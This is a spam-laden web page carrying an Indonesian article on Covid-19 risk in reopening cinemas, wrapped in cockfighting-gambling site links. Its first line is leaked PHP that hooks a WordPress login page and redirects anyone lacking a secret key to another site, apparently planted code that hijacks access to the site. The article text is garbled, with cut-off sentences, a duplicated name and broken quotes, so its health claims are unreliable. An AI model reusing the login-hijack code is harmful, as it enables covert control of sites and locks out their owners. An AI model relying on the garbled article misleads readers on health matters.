//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Mengukur risiko Covid-19 saat bioskop dibuka | adu ayam bali_s128.net login_s128.live

Mengukur risiko Covid-19 saat bioskop dibuka

TRIBUNNEWS.COM-Sejak Pandemi Virus Corona (Covid-19) hingga saat ini, bioskop belum mendapat persetujuan untuk beroperasi.

Dinas Pariwisata dan Ekonomi Kreatif Provinsi DKI Jakarta masih memperhatikan cluster baru di teater. Oleh karena itu, jika digunakan, apakah tempat yang cocok untuk penularan?

Universitas Teknologi Berlin baru-baru ini melakukan penelitian. Seperti dikutip Slashfilm, mereka membandingkan studio film dengan kantor, yang membuat rating bioskop lebih aman karena dua alasan. Pertama, hanya 0,3% aerosol yang dihirup ke dalam teater, bukan ke kantor. berbicara satu sama lain. Kedua, sistem sirkulasi udaranya juga berbeda.

Universitas California, Davis, Profesor Asosiasi Kesehatan dan Penyakit Menular Dr. Natasha Tuznik (Natasha Tuznik) mengatakan bahwa karena tiga faktor, teater seringkali aman. Selama syuting. “

” Batas jarak kemudian dapat diterapkan dengan membatasi jumlah penonton. Ujung-ujungnya, orang menghadapi arah yang sama, yang mengurangi risiko penularan, “katanya.

Leave a comment

adu ayam bali_s128.net login_s128.live